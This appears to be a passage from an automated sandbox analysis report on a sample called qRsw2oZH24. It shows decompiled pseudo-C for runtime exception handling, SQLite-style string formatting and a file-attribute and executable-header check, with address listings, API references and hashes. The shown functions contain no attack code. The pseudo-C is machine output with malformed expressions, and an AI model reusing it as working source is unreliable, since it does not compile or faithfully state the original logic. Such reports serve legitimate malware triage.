															goto L62;
														} else {
															__eflags = _t307[7];
															if(_t307[7] != 0) {
																L55:
																_t230 = _t307[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t307[7]);
																	_t231 = L00871E0B(_t274, _t307, _t321, _t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E008710AB(_t274, _t279, _t302, _t321) + 0x10) = _t274;
																	_t240 = E008710AB(_t274, _t279, _t302, _t321);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t307[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E008710AB(_t274, _t279, _t302, _t321) + 0x1c));
										_t270 = E008710AB(_t274, _t279, _t302, _t321);
										_push(_v20);
										 *(_t270 + 0x1c) = _t321;
										_t271 = L00871E0B(_t274, _t307, _t321, _t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t307 = _v20;
											_t358 =  *_t307 - _t321;
											if( *_t307 <= _t321) {
												L64:
												E00876ACE(_t274, _t290, _t302, __eflags);
											} else {
												_t300 = _t321;
												_v20 = _t321;
												while(1) {
													_t290 =  *((intOrPtr*)(_t300 + _t307[1] + 4));
													if(E00871A9F( *((intOrPtr*)(_t300 + _t307[1] + 4)), _t358, 0x8b3584) != 0) {
														goto L65;
													}
													_t321 = _t321 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t358 = _t321 -  *_t307;
													if(_t321 >=  *_t307) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											L00870D3A(_t290, _t302, __eflags);
											_t279 =  &_v68;
											E00871A87( &_v68);
											E00870EF8( &_v68, 0x8aff64);
											L66:
											 *(E008710AB(_t274, _t279, _t302, _t321) + 0x10) = _t274;
											_t233 = E008710AB(_t274, _t279, _t302, _t321);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											L0086EDC1(_t279, _t234, _t274);
											L00871D0B(_a8, _a16, _t307);
											_t237 = L00871EC8(_t307);
											_t337 = _t337 + 0x10;
											_push(_t237);
											L00871C82(_t274, _t279, _t302, _t307, _t321, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}


























































































                                    0x008713f0
                                    0x008713f0
                                    0x008713f7
                                    0x008713f9
                                    0x00871402
                                    0x00871408
                                    0x0087140b
                                    0x00871410
                                    0x00871413
                                    0x00871419
                                    0x008717a0
                                    0x008717a0
                                    0x008717a5
                                    0x008717a7
                                    0x008717a9
                                    0x008717ac
                                    0x008717ad
                                    0x008717b0
                                    0x008717b6
                                    0x008718d5
                                    0x008717bc
                                    0x008717be
                                    0x008717c5
                                    0x008717c8
                                    0x008717cb
                                    0x008717d1
                                    0x008717d3
                                    0x008717d8
                                    0x008717db
                                    0x008717dd
                                    0x008717e3
                                    0x008717e5
                                    0x008717eb
                                    0x00871800
                                    0x00871805
                                    0x00871808
                                    0x0087180a
                                    0x008718d1
                                    0x00000000
                                    0x008718d2
                                    0x0087180a
                                    0x008717eb
                                    0x008717e3
                                    0x008717db
                                    0x00871810
                                    0x00871813
                                    0x00871816
                                    0x00871819
                                    0x0087181c
                                    0x00871822
                                    0x00871834
                                    0x00871839
                                    0x0087183c
                                    0x0087183f
                                    0x00871842
                                    0x00871845
                                    0x00871848
                                    0x0087184b
                                    0x00000000
                                    0x00000000
                                    0x00871851
                                    0x00871851
                                    0x00871854
                                    0x00871857
                                    0x00871866
                                    0x00871867
                                    0x00871867
                                    0x00871869
                                    0x0087186c
                                    0x00000000
                                    0x00000000
                                    0x0087186e
                                    0x00871871
                                    0x00000000
                                    0x00000000
                                    0x0087187f
                                    0x00871881
                                    0x00871884
                                    0x00871886
                                    0x0087188e
                                    0x0087188e
                                    0x00871891
                                    0x00871893
                                    0x00871895
                                    0x008718b1
                                    0x008718b6
                                    0x008718b9
                                    0x008718b9
                                    0x00000000
                                    0x00871891
                                    0x00871888
                                    0x0087188c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008718bc
                                    0x008718bf
                                    0x008718c0
                                    0x008718c3
                                    0x008718c6
                                    0x008718c9
                                    0x008718cc
                                    0x008718cc
                                    0x00000000
                                    0x00871857
                                    0x008718d6
                                    0x008718db
                                    0x008718dc
                                    0x008718df
                                    0x008718e2
                                    0x008718e3
                                    0x008718e4
                                    0x008718e5
                                    0x008718e8
                                    0x008718ea
                                    0x00871962
                                    0x00871964
                                    0x00871964
                                    0x008718ec
                                    0x008718ec
                                    0x008718ef
                                    0x008718f2
                                    0x00000000
                                    0x008718f4
                                    0x008718f4
                                    0x008718f7
                                    0x008718fa
                                    0x00871901
                                    0x00871901
                                    0x00871904
                                    0x00871906
                                    0x00871908
                                    0x0087193a
                                    0x0087193a
                                    0x0087193d
                                    0x00871944
                                    0x00871944
                                    0x00871947
                                    0x0087194a
                                    0x00871951
                                    0x00871951
                                    0x00871954
                                    0x0087195b
                                    0x0087195d
                                    0x0087195d
                                    0x00871956
                                    0x00871956
                                    0x00871959
                                    0x00000000
                                    0x00000000
                                    0x00871959
                                    0x0087194c
                                    0x0087194c
                                    0x0087194f
                                    0x00000000
                                    0x00000000
                                    0x0087194f
                                    0x0087193f
                                    0x0087193f
                                    0x00871942
                                    0x00000000
                                    0x00000000
                                    0x00871942
                                    0x0087195e
                                    0x0087190a
                                    0x0087190a
                                    0x0087190a
                                    0x0087190d
                                    0x0087190d
                                    0x0087190f
                                    0x00871911
                                    0x00000000
                                    0x00000000
                                    0x00871913
                                    0x00871915
                                    0x00871929
                                    0x00871929
                                    0x00871917
                                    0x00871917
                                    0x0087191a
                                    0x0087191d
                                    0x00000000
                                    0x0087191f
                                    0x0087191f
                                    0x00871922
                                    0x00871925
                                    0x00871927
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00871927
                                    0x0087191d
                                    0x00871932
                                    0x00871932
                                    0x00871934
                                    0x00000000
                                    0x00871936
                                    0x00871936
                                    0x00871936
                                    0x00000000
                                    0x00871934
                                    0x0087192d
                                    0x0087192f
                                    0x0087192f
                                    0x00000000
                                    0x0087192f
                                    0x008718fc
                                    0x008718fc
                                    0x008718ff
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008718ff
                                    0x008718fa
                                    0x008718f2
                                    0x00871965
                                    0x00871969
                                    0x00871969
                                    0x00871428
                                    0x00871428
                                    0x00871431
                                    0x00871533
                                    0x00871533
                                    0x00000000
                                    0x00871460
                                    0x00871460
                                    0x00871465
                                    0x00871535
                                    0x00871535
                                    0x00871538
                                    0x00000000
                                    0x0087146b
                                    0x0087146b
                                    0x00871473
                                    0x00871737
                                    0x0087173b
                                    0x00871479
                                    0x0087147e
                                    0x00871481
                                    0x00871486
                                    0x0087148d
                                    0x00871492
                                    0x00000000
                                    0x008714ca
                                    0x008714d2
                                    0x0087153d
                                    0x0087153d
                                    0x00871540
                                    0x00871543
                                    0x00871543
                                    0x00871546
                                    0x00871549
                                    0x0087154f
                                    0x00871706
                                    0x00871706
                                    0x00871709
                                    0x00000000
                                    0x0087170b
                                    0x0087170b
                                    0x0087170f
                                    0x00000000
                                    0x00871715
                                    0x00871715
                                    0x00871718
                                    0x0087171b
                                    0x0087171c
                                    0x0087171d
                                    0x00871720
                                    0x00871721
                                    0x00871724
                                    0x00871725
                                    0x0087172a
                                    0x00000000
                                    0x0087172a
                                    0x0087170f
                                    0x00871555
                                    0x00871555
                                    0x00871559
                                    0x00000000
                                    0x0087155f
                                    0x0087155f
                                    0x00871566
                                    0x0087157e
                                    0x0087157e
                                    0x00871581
                                    0x00871587
                                    0x00871597
                                    0x0087159c
                                    0x0087159f
                                    0x008715a2
                                    0x008715a5
                                    0x008715a8
                                    0x008715ab
                                    0x008715ae
                                    0x008715b4
                                    0x008715b4
                                    0x008715b7
                                    0x008715ba
                                    0x008715c9
                                    0x008715ca
                                    0x008715ca
                                    0x008715cc
                                    0x008715cf
                                    0x008715d5
                                    0x008715d8
                                    0x008715de
                                    0x008715e0
                                    0x008715e3
                                    0x008715e6
                                    0x008715ef
                                    0x008715f2
                                    0x008715f4
                                    0x008715f4
                                    0x008715f7
                                    0x008715fa
                                    0x008715fd
                                    0x00871600
                                    0x00871603
                                    0x00871608
                                    0x00871609
                                    0x0087160a
                                    0x0087160b
                                    0x0087160c
                                    0x0087160f
                                    0x00871611
                                    0x00871613
                                    0x00000000
                                    0x00871615
                                    0x00871615
                                    0x00871615
                                    0x00871618
                                    0x0087161b
                                    0x0087161d
                                    0x0087161e
                                    0x00871623
                                    0x00871626
                                    0x00871628
                                    0x00000000
                                    0x00000000
                                    0x0087162a
                                    0x0087162b
                                    0x0087162e
                                    0x00871630
                                    0x00000000
                                    0x00871632
                                    0x00871632
                                    0x00871635
                                    0x00871638
                                    0x00000000
                                    0x00871638
                                    0x00000000
                                    0x00871630
                                    0x0087164c
                                    0x00871652
                                    0x00871656
                                    0x00871673
                                    0x00871678
                                    0x00871678
                                    0x0087167b
                                    0x0087167b
                                    0x00000000
                                    0x0087163b
                                    0x0087163b
                                    0x0087163c
                                    0x0087163f
                                    0x00871642
                                    0x00871645
                                    0x00871645
                                    0x00000000
                                    0x0087164a
                                    0x008715e6
                                    0x008715d8
                                    0x0087167e
                                    0x00871681
                                    0x00871682
                                    0x00871685
                                    0x00871688
                                    0x0087168b
                                    0x0087168e
                                    0x0087168e
                                    0x00871697
                                    0x0087169a
                                    0x0087169a
                                    0x0087169a
                                    0x008715ae
                                    0x0087169c
                                    0x008716a0
                                    0x008716a2
                                    0x008716a5
                                    0x008716ab
                                    0x008716ab
                                    0x008716ac
                                    0x008716b0
                                    0x0087172d
                                    0x0087172d
                                    0x00871732
                                    0x00871735
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008716b2
                                    0x008716b9
                                    0x008716be
                                    0x00000000
                                    0x008716c0
                                    0x008716c0
                                    0x008716c4
                                    0x008716d6
                                    0x008716d9
                                    0x008716dc
                                    0x008716de
                                    0x008716f5
                                    0x008716f9
                                    0x008716ff
                                    0x00871700
                                    0x00871702
                                    0x00000000
                                    0x00871704
                                    0x00000000
                                    0x00871704
                                    0x008716e0
                                    0x008716e5
                                    0x008716e8
                                    0x008716ed
                                    0x008716f0
                                    0x00000000
                                    0x008716f0
                                    0x008716c6
                                    0x008716c9
                                    0x008716cc
                                    0x008716ce
                                    0x00000000
                                    0x008716d0
                                    0x008716d0
                                    0x008716d4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008716d4
                                    0x008716ce
                                    0x008716c4
                                    0x008716be
                                    0x00871568
                                    0x00871568
                                    0x0087156f
                                    0x00000000
                                    0x00871571
                                    0x00871571
                                    0x00871578
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00871578
                                    0x0087156f
                                    0x00871566
                                    0x00871559
                                    0x008714d4
                                    0x008714dc
                                    0x008714df
                                    0x008714e4
                                    0x008714e8
                                    0x008714eb
                                    0x008714f1
                                    0x008714f4
                                    0x00000000
                                    0x008714f6
                                    0x008714f6
                                    0x008714f9
                                    0x008714fb
                                    0x0087173c
                                    0x0087173c
                                    0x00871501
                                    0x00871501
                                    0x00871503
                                    0x00871506
                                    0x0087150e
                                    0x00871519
                                    0x00000000
                                    0x00000000
                                    0x00871522
                                    0x00871523
                                    0x00871526
                                    0x00871529
                                    0x0087152b
                                    0x00000000
                                    0x00871531
                                    0x00000000
                                    0x00871531
                                    0x00000000
                                    0x0087152b
                                    0x00871506
                                    0x00871741
                                    0x00871741
                                    0x00871743
                                    0x00871744
                                    0x0087174b
                                    0x0087174e
                                    0x0087175c
                                    0x00871761
                                    0x00871766
                                    0x00871769
                                    0x0087176e
                                    0x00871771
                                    0x00871774
                                    0x00871777
                                    0x00871779
                                    0x0087177b
                                    0x0087177b
                                    0x00871780
                                    0x0087178c
                                    0x00871792
                                    0x00871797
                                    0x0087179a
                                    0x0087179b
                                    0x00000000
                                    0x0087179b
                                    0x008714f4
                                    0x008714d2
                                    0x00871492
                                    0x00871473
                                    0x00871465
                                    0x00871431

                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 008714EB
                                    • type_info::operator==.LIBVCRUNTIME ref: 00871512
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0087161E
                                    • CatchIt.LIBVCRUNTIME ref: 00871673
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 008716F9
                                    • _UnwindNestedFrames.LIBCMT ref: 00871780
                                    • CallUnexpected.LIBVCRUNTIME ref: 0087179B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 4234981820-393685449
                                    • Opcode ID: 5a3160ca6ac69283a7aac222595c4e6d9906d7e3d889e28329d1b971113a8673
                                    • Instruction ID: aa4b7ed65cefe82c9f419830832e9f437758f09dfdb2646325b12364a2a965d0
                                    • Opcode Fuzzy Hash: 5a3160ca6ac69283a7aac222595c4e6d9906d7e3d889e28329d1b971113a8673
                                    • Instruction Fuzzy Hash: 17C18F71C00209DFCF19DFACC88899EBBB5FF14310F148059E819ABA0AD731DA51CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0083D212 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 168COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 33%
                                    			E0083D212(signed char __ecx, char* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _t52;
				intOrPtr _t56;
				intOrPtr* _t74;
				intOrPtr* _t76;
				char* _t78;
				signed char _t80;
				intOrPtr _t81;
				char* _t83;
				intOrPtr _t84;
				short* _t85;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t95;
				char* _t97;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t105;

				_t80 = __ecx;
				_t52 =  *((char*)(__ecx + 1));
				_t100 = _t99 - 0x18;
				_t97 = __edx;
				_t78 = __edx;
				_t105 = _t52 - 0xfffffff8;
				if(_t105 > 0) {
					if(_t52 == 0xfffffffa) {
						_v8 =  *((intOrPtr*)(__ecx + 0x10));
						E00831AA8(0x20, __edx, "keyinfo(%d",  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) + 8)));
						_t93 = E00873BA0(_t97);
						_t81 = 0;
						_t56 = _v8;
						_t101 = _t100 + 0x14;
						_v12 = 0;
						if( *((intOrPtr*)(_t56 + 8)) <= 0) {
							L40:
							 *((short*)(_t93 + _t97)) = 0x29;
							L41:
							return _t78;
						}
						_t87 = _t56 + 0x10;
						_v16 = _t87;
						do {
							_t88 =  *_t87;
							_v20 = _t88;
							if(_t88 == 0) {
								_t41 = _t93 + 4; // 0x4
								_t89 = _t41;
								_v24 = _t89;
								if(_t89 >= 0x1a) {
									goto L37;
								}
								E0086F730(_t93 + _t97, ",nil", 4);
								_t93 = _v24;
								_t101 = _t101 + 0xc;
								L36:
								_t81 = _v12;
								_t56 = _v8;
								goto L37;
							}
							_t91 = E00873BA0( *_t88);
							_v24 = _t91;
							_t83 = _t93 + _t97;
							if(_t91 + _t93 > 0x1a) {
								E0086F730(_t83, ",...", 4);
								goto L40;
							}
							_t95 = _t93 + 1;
							 *_t83 = 0x2c;
							_t84 =  *((intOrPtr*)(_v8 + 0xc));
							if(_t84 != 0 &&  *((char*)(_t84 + _v12)) != 0) {
								 *((char*)(_t95 + _t97)) = 0x2d;
								_t95 = _t95 + 1;
							}
							_t37 = _t91 + 1; // 0x1
							E0086F730(_t95 + _t97,  *_v20, _t37);
							_t101 = _t101 + 0xc;
							_t93 = _t95 + _v24;
							goto L36;
							L37:
							_t81 = _t81 + 1;
							_t87 = _v16 + 4;
							_v12 = _t81;
							_v16 = _t87;
						} while (_t81 <  *((intOrPtr*)(_t56 + 8)));
						goto L40;
					}
					if(_t52 == 0xfffffffb) {
						_t85 =  *((intOrPtr*)(__ecx + 0x10));
						_push( *_t85);
						_push(_t85 + 0x1c);
						_push("%s(%d)");
						L25:
						_push(_t97);
						_push(0x20);
						E00831AA8();
						goto L41;
					}
					if(_t52 == 0xfffffffc) {
						_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)))));
						_push("collseq(%.20s)");
						L23:
						_push(_t97);
						_push(0x20);
						E00831AA8();
						goto L41;
					}
					L20:
					_t78 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t78 == 0) {
						_t78 = _t97;
						 *_t97 = 0;
					}
					goto L41;
				}
				if(_t105 == 0) {
					_t74 =  *((intOrPtr*)(__ecx + 0x10));
					_t80 =  *(_t74 + 0x1c) & 0x0000ffff;
					if((_t80 & 0x00000002) == 0) {
						if((_t80 & 0x00000004) != 0) {
							L10:
							_push( *((intOrPtr*)(_t74 + 4)));
							_push( *_t74);
							_push("%lld");
							goto L25;
						}
						if((_t80 & 0x00000008) == 0) {
							goto L41;
						}
						asm("movsd xmm0, [eax+0x8]");
						L8:
						_push(_t80);
						_push(_t80);
						asm("movsd [esp], xmm0");
						_push("%.16g");
						goto L25;
					}
					_t78 =  *((intOrPtr*)(_t74 + 0x14));
					goto L41;
				}
				if(_t52 == 0xfffffff2) {
					_push( *((intOrPtr*)(__ecx + 0x10)));
					_push(0x8a7ad8);
					goto L23;
				}
				if(_t52 == 0xfffffff3) {
					_t74 =  *((intOrPtr*)(__ecx + 0x10));
					goto L10;
				}
				if(_t52 == 0xfffffff4) {
					asm("movsd xmm0, [eax]");
					goto L8;
				}
				if(_t52 != 0xfffffff6) {
					goto L20;
				}
				_t76 =  *((intOrPtr*)(__ecx + 0x10));
				_push( *_t76);
				_push(_t76);
				_push("vtab:%p:%p");
				goto L25;
			}





























                                    0x0083d212
                                    0x0083d215
                                    0x0083d219
                                    0x0083d21e
                                    0x0083d220
                                    0x0083d223
                                    0x0083d226
                                    0x0083d2b2
                                    0x0083d310
                                    0x0083d31e
                                    0x0083d329
                                    0x0083d32b
                                    0x0083d32d
                                    0x0083d330
                                    0x0083d333
                                    0x0083d339
                                    0x0083d3eb
                                    0x0083d3eb
                                    0x0083d3f1
                                    0x0083d3f7
                                    0x0083d3f7
                                    0x0083d33f
                                    0x0083d342
                                    0x0083d345
                                    0x0083d345
                                    0x0083d347
                                    0x0083d34c
                                    0x0083d39c
                                    0x0083d39c
                                    0x0083d39f
                                    0x0083d3a5
                                    0x00000000
                                    0x00000000
                                    0x0083d3b2
                                    0x0083d3b7
                                    0x0083d3ba
                                    0x0083d3bd
                                    0x0083d3bd
                                    0x0083d3c0
                                    0x00000000
                                    0x0083d3c0
                                    0x0083d355
                                    0x0083d358
                                    0x0083d35b
                                    0x0083d364
                                    0x0083d3e3
                                    0x00000000
                                    0x0083d3e8
                                    0x0083d369
                                    0x0083d36a
                                    0x0083d36d
                                    0x0083d372
                                    0x0083d37d
                                    0x0083d381
                                    0x0083d381
                                    0x0083d382
                                    0x0083d38f
                                    0x0083d394
                                    0x0083d397
                                    0x00000000
                                    0x0083d3c3
                                    0x0083d3c6
                                    0x0083d3c7
                                    0x0083d3ca
                                    0x0083d3cd
                                    0x0083d3d0
                                    0x00000000
                                    0x0083d3d9
                                    0x0083d2b7
                                    0x0083d2ed
                                    0x0083d2f3
                                    0x0083d2f7
                                    0x0083d2f8
                                    0x0083d2fd
                                    0x0083d2fd
                                    0x0083d2fe
                                    0x0083d300
                                    0x00000000
                                    0x0083d305
                                    0x0083d2bc
                                    0x0083d2d6
                                    0x0083d2d8
                                    0x0083d2dd
                                    0x0083d2dd
                                    0x0083d2de
                                    0x0083d2e0
                                    0x00000000
                                    0x0083d2e5
                                    0x0083d2be
                                    0x0083d2be
                                    0x0083d2c3
                                    0x0083d2c9
                                    0x0083d2cb
                                    0x0083d2cb
                                    0x00000000
                                    0x0083d2c3
                                    0x0083d22c
                                    0x0083d286
                                    0x0083d289
                                    0x0083d290
                                    0x0083d29d
                                    0x0083d26d
                                    0x0083d26d
                                    0x0083d270
                                    0x0083d272
                                    0x00000000
                                    0x0083d272
                                    0x0083d2a2
                                    0x00000000
                                    0x00000000
                                    0x0083d2a8
                                    0x0083d259
                                    0x0083d259
                                    0x0083d25a
                                    0x0083d25b
                                    0x0083d260
                                    0x00000000
                                    0x0083d260
                                    0x0083d292
                                    0x00000000
                                    0x0083d292
                                    0x0083d231
                                    0x0083d27c
                                    0x0083d27f
                                    0x00000000
                                    0x0083d27f
                                    0x0083d236
                                    0x0083d26a
                                    0x00000000
                                    0x0083d26a
                                    0x0083d23b
                                    0x0083d255
                                    0x00000000
                                    0x0083d255
                                    0x0083d240
                                    0x00000000
                                    0x00000000
                                    0x0083d242
                                    0x0083d245
                                    0x0083d247
                                    0x0083d248
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %.16g$%lld$%s(%d)$,...$,nil$collseq(%.20s)$keyinfo(%d$vtab:%p:%p
                                    • API String ID: 4218353326-1567635944
                                    • Opcode ID: d39b67155429080a3c15f650b2b6ca7d0689cfbf5e376dc4b094c474ad137c1f
                                    • Instruction ID: bbc92f6948531c94d4ed9ebe0acb81859e40df63a61ed930f849631228a6faf4
                                    • Opcode Fuzzy Hash: d39b67155429080a3c15f650b2b6ca7d0689cfbf5e376dc4b094c474ad137c1f
                                    • Instruction Fuzzy Hash: 9551B371A00704EFDB18CF5CE881E6A77A4FF85318F244699E521DB292E771ED42CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00817521 Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E00817521(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr* _a8, signed int* _a12) {
				void _v8;
				void _v12;
				long _v16;
				void _v20;
				signed int* _v24;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				struct _BY_HANDLE_FILE_INFORMATION _v76;
				signed int* _t50;
				intOrPtr* _t51;
				void _t76;
				signed int _t78;
				void* _t80;
				signed int _t90;
				long _t103;
				intOrPtr _t108;
				signed int _t112;
				signed int _t117;
				long _t118;
				intOrPtr* _t119;
				signed int* _t120;

				_v24 = __edx;
				_v8 = __ecx;
				if(GetFileInformationByHandle(__ecx,  &_v76) == 0) {
					return 0x200;
				}
				_t78 = _v76.dwFileAttributes;
				_t117 = _t78 & 0x00000001;
				_t85 =  ==  ? _t117 : _t117 | 0x00000002;
				_t107 =  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004;
				_v12 = _t78 & 0x00000010;
				_t47 =  ==  ?  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004 : _t107 | 0x00000010;
				_t108 = 0x81000000;
				_t90 =  ==  ?  ==  ?  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004 : _t107 | 0x00000010 : ( ==  ?  ==  ?  ==  ? _t117 : _t117 | 0x00000002 : _t85 | 0x00000004 : _t107 | 0x00000010) | 0x00000020;
				_t111 =  ==  ? 0x81000000 : 0x41000000;
				_t112 = ( ==  ? 0x81000000 : 0x41000000) | _t90;
				if(_t117 == 0) {
					_t108 = 0x81800000;
					_t115 =  ==  ? 0x81800000 : 0x41800000;
					_t112 = ( ==  ? 0x81800000 : 0x41800000) | _t90;
				}
				_t80 = _v8;
				_t118 = GetFileSize(_t80, 0);
				if(_t118 > 0x28) {
					SetFilePointer(_t80, 0, 0, 0);
					ReadFile(_t80,  &_v8, 2,  &_v16, 0);
					SetFilePointer(_t80, 0x24, 0, 0);
					ReadFile(_t80,  &_v12, 4,  &_v16, 0);
					if(_v8 == 0x54ad) {
						_t103 = _v12;
						if(_t118 > _t103 + 0x34) {
							SetFilePointer(_t80, _t103, 0, 0);
							ReadFile(_t80,  &_v20, 4,  &_v16, 0);
							_t76 = _v20;
							if(_t76 == 0x5a4d || _t76 == 0x454e || _t76 == 0x454c || _t76 == 0x4550) {
								_t112 = _t112 | 0x00400000;
							}
						}
					}
				}
				_t50 = _v24;
				if(_t50 != 0) {
					 *_t50 = _t112;
				}
				_t51 = _a4;
				if(_t51 != 0) {
					 *_t51 = _t118;
				}
				_t119 = _a8;
				if(_t119 != 0) {
					asm("sbb eax, ebx");
					 *_t119 = E00890420(_v76.ftLastAccessTime - 0xd53e8000, _v60, 0x989680, 0);
					asm("sbb eax, ebx");
					 *((intOrPtr*)(_t119 + 4)) = _t108;
					 *((intOrPtr*)(_t119 + 8)) = E00890420(_v76.ftLastWriteTime - 0xd53e8000, _v52, 0x989680, 0);
					asm("sbb eax, ebx");
					 *((intOrPtr*)(_t119 + 0xc)) = _t108;
					 *((intOrPtr*)(_t119 + 0x10)) = E00890420(_v76.ftCreationTime - 0xd53e8000, _v68, 0x989680, 0);
					 *((intOrPtr*)(_t119 + 0x14)) = _t108;
				}
				_t120 = _a12;
				if(_t120 != 0) {
					_push(_v52);
					E008174C4( &_v8,  &_v12, _v76.ftLastWriteTime);
					 *_t120 = (_v8 & 0x0000ffff) << 0x00000010 | _v12 & 0x0000ffff;
				}
				return 0;
			}

























                                    0x0081752d
                                    0x00817532
                                    0x0081753d
                                    0x00000000
                                    0x0081753f
                                    0x00817549
                                    0x00817555
                                    0x00817561
                                    0x0081756b
                                    0x00817578
                                    0x0081757d
                                    0x00817580
                                    0x0081758d
                                    0x00817595
                                    0x00817598
                                    0x0081759c
                                    0x008175a5
                                    0x008175aa
                                    0x008175ad
                                    0x008175ad
                                    0x008175af
                                    0x008175bb
                                    0x008175c0
                                    0x008175cc
                                    0x008175df
                                    0x008175ec
                                    0x008175ff
                                    0x0081760e
                                    0x00817610
                                    0x00817618
                                    0x00817620
                                    0x00817633
                                    0x00817639
                                    0x00817641
                                    0x00817658
                                    0x00817658
                                    0x00817641
                                    0x00817618
                                    0x0081760e
                                    0x0081765e
                                    0x00817663
                                    0x00817665
                                    0x00817665
                                    0x00817667
                                    0x0081766c
                                    0x0081766e
                                    0x0081766e
                                    0x00817670
                                    0x00817675
                                    0x0081768f
                                    0x0081769c
                                    0x008176aa
                                    0x008176ac
                                    0x008176b9
                                    0x008176c8
                                    0x008176ca
                                    0x008176d4
                                    0x008176d7
                                    0x008176d7
                                    0x008176da
                                    0x008176df
                                    0x008176e1
                                    0x008176ed
                                    0x00817701
                                    0x00817701
                                    0x00000000

                                    APIs
                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 00817535
                                    • GetFileSize.KERNEL32(?,00000000,?,?), ref: 008175B5
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 008175CC
                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?), ref: 008175DF
                                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 008175EC
                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 008175FF
                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 00817620
                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 00817633
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
